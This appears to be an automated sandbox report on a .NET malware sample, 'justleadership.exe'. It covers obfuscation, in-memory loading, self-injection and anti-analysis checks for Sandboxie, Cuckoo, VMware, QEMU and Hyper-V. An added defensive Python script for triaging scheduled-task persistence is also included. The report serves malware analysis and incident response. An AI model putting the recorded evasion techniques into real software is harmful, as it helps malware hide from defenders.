Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\justleadership.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\justleadership.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\justleadership.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: justleadership.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: justleadership.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: justleadership.exe Static file information: File size 6369280 > 1048576
Source: justleadership.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x612600
Source: justleadership.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2162532593.0000000006C10000.00000004.08000000.00040000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.0000000004212000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2150003802.00000000040A1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmp
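The Task registration and Security API entries above come from a bundled copy of the open-source Microsoft.Win32.TaskScheduler wrapper (the PDB path names dahall's TaskScheduler repository), so the sample ships the RegisterTaskDefinition / RegisterTask / CreateFolder capability even though this run records no task registration. On a host where the sample executed, the check a responder wants is a pass over the Task Scheduler store for definitions that launch from user-writable paths, hide themselves, or ask for the highest available run level. The script below is an added example, not code from the report or from the sample; the two task definitions, the task names, the executable name and the list of user-writable locations are constructed for illustration.

```python
"""Triage Windows Task Scheduler definitions for persistence indicators.

Added example, not code from the report or from the analysed sample.
Task definitions are stored as UTF-16 XML under C:\\Windows\\System32\\Tasks\\
and are also what `schtasks /query /tn <name> /xml` prints.
"""
import os
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to (assumption: a generic triage list,
# not something the report states). A task whose action launches from one of
# these is the classic user-level persistence pattern.
USER_WRITABLE = re.compile(
    r"^(?:%(?:APPDATA|LOCALAPPDATA|TEMP|TMP|USERPROFILE)%"
    r"|[A-Za-z]:\\Users\\[^\\]+\\"
    r"|[A-Za-z]:\\ProgramData\\"
    r"|[A-Za-z]:\\Windows\\Temp\\)",
    re.IGNORECASE,
)


def _text(elem, path):
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def triage_task(xml_text, name="<unnamed>"):
    """Parse one task definition and return what a responder wants to see."""
    root = ET.fromstring(xml_text)
    commands = [_text(exec_, "t:Command").strip('"')
                for exec_ in root.findall("t:Actions/t:Exec", NS)]
    triggers = [child.tag.split("}", 1)[1]
                for child in root.findall("t:Triggers/*", NS)]
    run_level = _text(root, "t:Principals/t:Principal/t:RunLevel")
    hidden = _text(root, "t:Settings/t:Hidden").lower() == "true"
    author = _text(root, "t:RegistrationInfo/t:Author")

    findings = []
    for cmd in commands:
        if USER_WRITABLE.match(cmd):
            findings.append(f"action runs from user-writable path: {cmd}")
    if hidden:
        findings.append("task is marked Hidden")
    if run_level == "HighestAvailable":
        findings.append("task requests HighestAvailable run level")
    return {"name": name, "author": author, "commands": commands,
            "triggers": triggers, "run_level": run_level, "hidden": hidden,
            "findings": findings}


def scan_tasks_folder(folder=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store (Windows only; needs read access)."""
    results = []
    for dirpath, _, files in os.walk(folder):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-16") as fh:  # files carry a BOM
                results.append(triage_task(fh.read(), name=path))
    return [r for r in results if r["findings"]]


# Constructed sample definitions (hypothetical; not taken from the report).
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user-PC\\user</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><LogonType>InteractiveToken</LogonType>
    <RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec>
    <Command>"C:\\Users\\user\\AppData\\Roaming\\Updater\\update.exe"</Command>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\\system32\\sc.exe</Command>
    <Arguments>start w32time</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("Updater", SUSPICIOUS_TASK), ("Maintenance", BENIGN_TASK)):
        result = triage_task(xml_text, name)
        print(name, result["triggers"], result["findings"] or "clean")
```

Run it against the live store with `scan_tasks_folder()` on the affected host, or feed it the XML exported by `schtasks /query /tn <name> /xml` from a collection script. The triggers are returned rather than scored because logon and boot triggers are common in legitimate tasks; they matter here in combination with an action under the user's profile.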

Data Obfuscation

Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs .Net Code: Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777259)),Type.GetTypeFromHandle(GEudGH2KGAjhApV2kvl.Hfg3NfQEBU(16777263))})
Source: justleadership.exe, -.cs .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: justleadership.exe, Eutboveuhzm.cs .Net Code: _E003 System.AppDomain.Load(byte[])
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.justleadership.exe.6b90000.9.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.42ac200.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.6c10000.10.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 0.2.justleadership.exe.40d1990.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 0.2.justleadership.exe.6ad0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2160604823.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_069B2E5F pushfd ; retf 0_2_069B2E60
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A44F28 push eax; ret 0_2_06A44F29
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A4346B push eax; iretd 0_2_06A4346D
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A94F33 push es; retf 0_2_06A94F7C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06A98F1A push es; retf 0_2_06A98F20
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B66F11 push es; ret 0_2_06B66F20
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B835E2 push ecx; retf 0_2_06B835E3
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85AA2 push es; retf 0_2_06B85B38
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85A79 push es; retf 0_2_06B85A9C
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B85B4A push es; ret 0_2_06B85B68
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8B8A0 push es; ret 0_2_06B8B950
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06B8599E push es; retf 0_2_06B859A4
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06C03E29 pushfd ; ret 0_2_06C03E30
Source: C:\Users\user\Desktop\justleadership.exe Code function: 0_2_06E768FE push esi; retf 0_2_06E76907
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, url4dHBYRv4DinV2mxi.cs High entropy of concatenated method names: 'FToBudHHBO', 'QS0BhaWAyw', 'daNBfhJypC', 'AP4BThMdbg', 'Fl5Br9ra78', 'BOFBZ8fpP8', 's2KBXNYTTJ', 'CnpBjqolcY', 'o7VBDsKd72', 'NUaB81AYS2'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'U0ennNPk4THDRcVqk3W'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RmXGCEYe833fceXaGLY.cs High entropy of concatenated method names: 'LcpYCOib37', 'eHCqTSyrsutwaDq6evY', 'Jd1D2byZL5My41Ql3u7', 'dMWA4SyXRnJr1mGBRQD', 'nVssCVyjhodYc7btY9Q', 'zePYJByD6nXCoGG2Oiq', 'ITG0bry81yZAwJ1HlF6', 'Am2H1lyUP0Fcy4FC6R1', 'eUfI7CyE3PMMRTj1kMf', 'WrsZWVyTgjy8woVc5rR'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mCTrEn2z2fhB72SJbcF.cs High entropy of concatenated method names: 'z2FZtDbGNR', 'uLOZ5JpE7H', 'toSZlp2NC7', 'raVZx4x8Wx', 'sMCZ0s3h9R', 'Gx2ZQrKMAl', 'lHvZLWxpSU', 'N0ehdm8jf6', 'DRsZgU5Y2b', 'MJUZKwyQ7m'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, RjIvudFr6Fj3bWrFWjZ.cs High entropy of concatenated method names: 'urgFXhYqML', 'WToFjNUokq', 'usgcvtywqGTelLrfZN1', 'VoWZ0Cy4kcmf3vLRsYH', 'nH791RyOEmGc1yMjjWR', 'C0OEVnykcGlR3ldyOM6', 'rMGq2Ay1b4wr8T80lou', 'JKYFTeyeSIy3sMD2NGe', 'V6aQBTyNJn0EYd44TBb', 'vLlB9oyC0eHvOSgQ6bZ'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, K5lXLQYbpPLs7Cy7sZ5.cs High entropy of concatenated method names: 'HY5YMJJ5er', 'IOtyr1KM3AsTRqBMKqV', 'jvmqn9K6dhsHlDYEegF', 'JaFRCEKmdU3qMnX49wG', 'PR0MI5K35eP4eq9stw6', 'M7pGnIKWxvKtmEQ7nwU', 'tr2TNMKpdiApgcdAWQC', 'TgLQs1KbJXCmh6ibZ47', 'cr88jbKo6bRwX0eS8jJ'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, FQqLQOYvo9K7kMZ7dEH.cs High entropy of concatenated method names: 'EwaYkGYqMt', 'vlVOrcKHPaC4PJumIBk', 'xNwpy3KzDeiLgZmfv8u', 'ofusQoyGbNs8rQ2IHvc', 'AhTkBJyArJQj8vRVyba', 'irtVpIyVPHc1R9sogIv', 'xhCpfgyqRo7vrT2VKOL', 'HnrHvPy7gnCn1agivpt', 'YN301ayijlWW2axOSqi', 'WUsYOcyBJSVcLCMaiDH'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, UVyr1uUeGgqQycKKbb.cs High entropy of concatenated method names: 'sE2t85lsK', 'Jhr5Cby6x', 'Jf9x9lXnW', 'dJxluROf3', 'GrwIFmxidWw82L5HP0i', 'jPBlh7xByJN60mY39PW', 'rYyDIaxIBX2pOsLutlk', 'aJ8AEdxcDTl8RDTHlrE', 'qlo7TgxYrjrWUddf06A', 'lR8wBLxq8ZSfrKWsMGN'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, oF4cRViQA2MnNFvgeQW.cs High entropy of concatenated method names: 'MwSig7cek5', 'tMbiEd0e2i69S1WbXMr', 'EWA7oL0NhByPdOfVTR3', 'VZWYnx0CiCsFJCsEql8', 'ESk32o0RWKp00dYMOli', 'RwkCBH0HYaSXDBxu9F0', 'LMSwnL042CNqRhIYMgo', 'HpDtFJ01bp6mHlcP4o8'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, JBMOeuYRYHJniwiOAbg.cs High entropy of concatenated method names: 'e4dYzIvRyZ', 'QbjFAHVcaE', 'msoFGu3HyF', 'inYyl7ylB7VMFJwCfa8', 'CNoSS9ytQG4qeZKyr7T', 'Mko42Vy5mQWKVuYBy5e', 'Ev3ZqsyxT1kfBVJIQQM', 'cIDs0Ty0cHnQg6jROFc'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, P2NQ5phXim7fiptqdX.cs High entropy of concatenated method names: 'YDlESIE8d', 'OYcTnsfwA', 'rjoZ6gSog', 'AF3X3GrOa', 'euUf8BYNF', 'jgmOPrleo1d08c4C0IO', 'fVJteFlNUqAK0951DNu', 'cccYYylCZVsB5gku9pT', 'LJVD59lR8XYAblLfDSS', 'beGnkQlHSnp1dpQ4hhU'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, uN1Y14iMJqSiYBGmnt7.cs High entropy of concatenated method names: 'Kaoim8YcYD', 'ShMi3fdELB', 'JbTiWt7X5y', 'j2IGiXQmrsJfY4cvf1V', 'fLimbjQ34wRQkpZPpN8', 'KJMqIrQMuCVkUuA12WI', 'FOhA1rQ6NBi2YZUQnhM', 'rv35qNQWNUPmA5dfAuu', 'R8UU6LQpYyqdo3eqhSa', 'syRiq3QsZ908BfSkFou'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, Sdq9OaF91PgcsvZ1qVj.cs High entropy of concatenated method names: 'cngabyayfPMq8GFSA3o', 'ARvuNfaPmsvuxo4NpAM', 'afi22EGM6x', 'R8L9pLaoGZkiwrw0gg6', 'RE9ubNaMrp9Z50pKV1C', 'SCt9Ida68Dc2B8FahQx', 'QM2A04amWLbL9KlRE1E', 'oF9xdla3PxJdiJifS4J', 'xHFrLkaWSpX8AxrUtdK', 'nBHO2yapcJhhYYq3iKH'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, tutioMi5rSsHCFM8roS.cs High entropy of concatenated method names: 'Oo9ixsYquO', 'ayqi01DrS9', 'X9V57y0nSpKGVqtbXHl', 'XDffTQ0s98pUBf8HFp2', 'MQLCdm0J6T1o48ZaEPD', 'ckUFt30vLILGrmb2AVR', 'Iv1WV70OLULRiyTtyiP', 'aKRJ6x0kfnkrv96dveM'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, U7h5sdBy6DKgXavfsmE.cs High entropy of concatenated method names: 'm1vB6jQraN', 'r04CLUL1xk81xh7ZbF7', 'IigsFiLee5y8bwaIUof', 'FfRGBPLNO1xqdVbUVJZ', 'lwEtO8LwNmfOW9IqiFi', 'YrNFZtL423s3Qiis2Kx', 'M9lqE1LskC8Llmcret3', 'bcqAdyLJQJdtKjnUcCW'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, yYDlN32bGE2YDaEeKnk.cs High entropy of concatenated method names: 'AID2O5gP53', 'cxD2kM9Z9B', 'e5N2wlCIlL', 'lDY241hWvv', 's8M21bkLnZ', 'f8X2e2GvR6', 'HiM2NWNWIF', 'Goq2C1HM14', 'mdj2R5mrrE', 'sWG2HElo04'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, cqVKKxYyN45AjLfeK2Z.cs High entropy of concatenated method names: 'XSGYaFNMag', 'dTwY9vllC5', 'Yix4q7Ku0Lw3M6ugGIU', 'PEOxi3K2x5Pl0OKo4xp', 'CjXZkaKh0LfQWbLM1Mc', 'WBCUqkKSU4LIb1fiYYW', 'ugYT47KfuJPdL6pSyUZ', 'cRL9IWKERYAFKmZin22', 'sidBQ8KTL0SRhK9wSFa', 'yXrNNEKrhwt9MbUZuL1'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, jIlhxliK9NnMpvvFoHZ.cs High entropy of concatenated method names: 'MK8iPcjDUS', 'oqqia2CUAd', 'Ikxi9oZC4D', 'qloibwPl9S', 'UyEio8443P', 'HrRHG8QVtjvjsT35riG', 'X73DGFQqXZjKw7srj9T', 'iFF6YNQ7eJovTeeTjxH', 'HOn2P9QiwMrPFgM6Lr6', 'FPS1nIQB6oSEn8v1BTG'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dvkauUYtyHA3eecX0hi.cs High entropy of concatenated method names: 'NmHYlyoXRi', 'AFOFbDgwTWKoMioonYX', 'Rwel1ag4BfHyb5BbS7N', 'g9gxCRg1PPaw7YKLFOS', 'wBr6ypger1yRjrMB0sC', 'SpeUqKgN7KQj1sxNJ34', 'cJTjJFgCsYESYTdQdgD', 'FvPfP0gR5Ma5U5bPTfM', 'fPgaHqgO8xysRmtVUwn', 'b3IZcAgk5B19TpMvJJs'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, dtKME3FDc6j3rDD0TG0.cs High entropy of concatenated method names: 'pc4FULwDvx', 'e9PAW8PSefImhjop0qt', 'B638lsPfwmqb9I9lkdV', 'KZvLcZPECSfI2GgZcug', 'Kxd6KAPTHZxKymY8TOU', 'Aue5KxPrFGEik7M8PnG', 'OqOlEPPZ55Ekqe8MG75', 'UhLNtBPXLHj5ZqHwtOx', 'BrykBcP2cpPiIoHE7my', 'XQGLsGPh0TiaWh2BqnI'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, mjkG0pFKuWb2elvhQh0.cs High entropy of concatenated method names: 'XDO34GkTR9', 'eiyo0aadkgQg7BB8xBq', 'G16Ll6atElV7StEqhwV', 'Fl6ZDDa5nrKoBedxD46', 'Go7JI0alMQbyxC1G1sQ', 'F0ftdYa8qOf61QyjtSB', 'iqwjykaUmX0hRoX9QQb', 'U3rTcwaxAoOJAS0d1QO', 'Yd0eOna04LSAbKbNDEM'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, LnXMW5YLnd99XKi9u9o.cs High entropy of concatenated method names: 'aNsYKueKqc', 'nBEs2JK7PZfSOIaB1FG', 'kFjTZfKiwa1FZBe4dY3', 'kFpbgZKBhIo7kUNCdU7', 'jiS78HKImlTNQn7bwWf', 'JAYXT7Kc9DVwHIlYJPN', 'NxtUBnKYC2ZMruDAWxb', 'Vc2wKjKV9MwS6YyGQt3', 'xPV9H2KqLRXq0Wv4Y06'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, nHVKcaVt2psstHNjQvx.cs High entropy of concatenated method names: 'KYnVlt5WWo', 'Ix5K5FxMc6PhVD7bBRY', 'IoBqMTx6RtCRifPXPGh', 'RdRxqFxmyqhVMgerTEH', 'XUDkrax3xSILQ9uMKt3', 'B1ScObxWyhxrvN6qtkD', 'GvdIO0xpLKUe0TGUJ2t', 'Y048I4xspN9NyTdYOwo', 'd3GAqrxJZMPKCWXt1dH', 'lBMEgYxn9QV2gmGXccp'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, bwvNQaFd072Hc2YmXnF.cs High entropy of concatenated method names: 'gtlF5usUP6', 'JNWFlX3dfs', 'e2sJFvPUIIGhx6GfKOq', 'jPoUChPdPd3Ood2PbY0', 'kJ10EmPtgyf4w4ofWrY', 'lcaY1SPDdvv37scy1N8', 'BIPUfqP8OWt1kr3qdmU', 'KnKyhwP53tuGyPthV3H', 'nr9lNHPlYEexcicISrj', 'msyPg9PxeOl3rRRtfCE'
Source: 0.2.justleadership.exe.449a250.2.raw.unpack, BQX11lY6oX7kEem0G3x.cs High entropy of concatenated method names: 'GKFYp2IpK5', 'GmkYsrMZI0', 'Ql4Y3xB5lY', 'dMSYW6lZkk', 'ljCumkKvrW2WJlr5XGU', 'h6TrcMKO7iCTVSWb2cd', 'Mf8MBtKkBJTFnvI7xT4', 'l56D0PKw2EAH1OuwBHQ', 'jijrL0K4NVPotL1hPDp', 'vgCcqXK1O3ZNlnqv9iA'
Source: C:\Users\user\Desktop\justleadership.exe Process information set: NOOPENFILEERRORBOX (92 identical entries)

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: justleadership.exe PID: 6640, type: MEMORYSTR
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL@\KQ
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \QEMU-GA.EXE@\KQ
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE|VIRTUAL|A M I|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT|VMWARE|VIRTUALXJOHNYANNAZXXXXXXXX
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 1690000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 30A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 18A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: 5230000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\justleadership.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\justleadership.exe TID: 6676 Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\justleadership.exe TID: 6676 Thread sleep time: -38961s >= -30000s
Source: C:\Users\user\Desktop\justleadership.exe TID: 4460 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\justleadership.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Users\user\Desktop\justleadership.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware\V
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareLRkq
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen@\kq
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $kq 1:en-CH:VMware|VIRTUAL|A M I|Xen
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HXHDX OMPBA5H7CP@\kq0VMware|VIRTUAL|A M<,t
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWareLRkqD
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $kq 1:en-CH:Microsoft|VMWare|Virtual
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: explorerJSbieDll.dllKcuckoomon.dllLwin32_process.handle='{0}'MParentProcessIdNcmdOselect * from Win32_BIOS8Unexpected WMI query failurePversionQSerialNumberSVMware|VIRTUAL|A M I|XenTselect * from Win32_ComputerSystemUmanufacturerVmodelWMicrosoft|VMWare|VirtualXjohnYannaZxxxxxxxx
Source: justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen(_kq
Source: justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe@\kq
Source: justleadership.exe, 00000000.00000002.2123072673.000000000353D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 7lPk2bnBC8GWF8b TdZa51Ph@\kq0Microsoft|VMWare|V<
Source: justleadership.exe, 00000000.00000002.2119536181.0000000001445000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\justleadership.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\justleadership.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\justleadership.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\justleadership.exe Memory written: C:\Users\user\Desktop\justleadership.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\justleadership.exe Process created: C:\Users\user\Desktop\justleadership.exe "C:\Users\user\Desktop\justleadership.exe"
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Users\user\Desktop\justleadership.exe VolumeInformation
Source: C:\Users\user\Desktop\justleadership.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
